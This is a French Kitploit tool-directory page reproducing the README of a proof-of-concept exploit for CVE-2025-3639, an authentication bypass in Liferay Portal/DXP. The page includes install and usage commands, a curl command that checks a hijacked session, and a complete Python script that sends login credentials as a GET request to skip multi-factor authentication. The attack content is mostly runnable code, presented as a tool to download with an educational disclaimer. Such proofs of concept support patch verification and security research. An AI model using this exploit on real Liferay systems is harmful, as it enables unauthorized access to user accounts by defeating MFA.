Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3639 — vulnérabilité de contournement de connexion dans Liferay Portal (versions 7.3.0–7.4.3.132) et Liferay DXP (diverses versions de 2024.Q1 à 2025.Q1.6) | Kitploit
Outils/GitHubGitHub/6lj/cve-2025-3639
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub6lj/cve-2025-3639

CVE-2025-3639

vulnérabilité de contournement de connexion dans Liferay Portal (versions 7.3.0–7.4.3.132) et Liferay DXP (diverses versions de 2024.Q1 à 2025.Q1.6)

Voir le dépôt
2il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3639 PoC - Contournement de l'authentification dans Liferay Portal/DXP

Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-3639, une vulnérabilité de contournement de l'authentification dans Liferay Portal (versions 7.3.0 à 7.4.3.132) et Liferay DXP (plusieurs versions de 2024.Q1 à 2025.Q1.6). La PoC montre comment un utilisateur non authentifié disposant d'identifiants valides peut contourner l'authentification multi-facteurs (MFA) en modifiant une requête POST en requête GET, ce qui peut potentiellement permettre un accès non autorisé aux comptes utilisateurs.

Avertissement : Cette PoC est uniquement à des fins éducatives. Les tests ou l'exploitation non autorisés de cette vulnérabilité sont illégaux et contraires à l'éthique. Utilisez-la uniquement avec l'autorisation écrite explicite du propriétaire du système.

Prérequis

  • Environnement : Linux (par exemple, Kali Linux, Ubuntu, ou un environnement virtualisé).
  • Dépendances :
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • Réseau : Accès à une instance cible de Liferay Portal/DXP (doit être dans un environnement de test avec autorisation explicite).
  • Identifiants : Identifiants utilisateur valides pour l'instance Liferay cible.

Installation

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Assurez-vous que Python 3 et la bibliothèque requests sont installés :

    root@kitploit:~
    pip3 install requests
    

Ce qu'il fait

  • La PoC exploite CVE-2025-3639 en modifiant une requête POST de connexion en requête GET, contournant les vérifications MFA.
  • Elle envoie une requête GET HTTP spécialement conçue avec des identifiants valides pour s'authentifier sans terminer le processus MFA.
  • Le script est conçu pour démontrer la vulnérabilité dans un environnement contrôlé et autorisé.

Utilisation

Exécutez le script PoC avec les arguments appropriés (remplacez <target_url>, <username> et <password> avec l'URL de l'instance Liferay cible et des identifiants valides).

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • Paramètres :
    • --target : L'URL de l'instance Liferay Portal/DXP (ex. http://example.com).
    • --username : Nom d'utilisateur valide pour l'instance cible.
    • --password : Mot de passe valide pour le nom d'utilisateur.

Exemple

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

Vérifier les résultats

  • Succès : Si l'exploitation fonctionne, le script renverra un jeton de session valide ou un message de succès indiquant l'accès au compte utilisateur sans MFA.

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • Sortie attendue : Détails de l'utilisateur confirmant une authentification réussie.
  • Échec : Si le serveur renvoie une erreur (par exemple, 401 Unauthorized ou 403 Forbidden), l'instance peut ne pas être vulnérable, ou la MFA n'est pas activée.

  • Surveiller le trafic : Utilisez un outil comme Wireshark pour inspecter le trafic HTTP :

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

PoC Script

Voici le code exemple pour poc.py :

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

Remarques importantes

  • Cette PoC nécessite des identifiants valides, car la vulnérabilité permet de contourner la MFA mais pas de deviner les identifiants.
  • Testez uniquement dans un environnement contrôlé avec l'autorisation explicite du propriétaire du système.
  • La vulnérabilité a été corrigée dans les versions plus récentes de Liferay Portal/DXP. Mettez à jour vers la dernière version pour atténuer ce problème.
  • Avis de sécurité Liferay
  • NVD CVE-2025-3639
  • Dépôt GitHub

Clause de non-responsabilité

Ce projet est uniquement à des fins éducatives. L'auteur n'est pas responsable de toute utilisation non autorisée ou illégale de cette PoC. Obtenez toujours l'autorisation explicite du propriétaire du système avant de tester.

Télécharger l’outil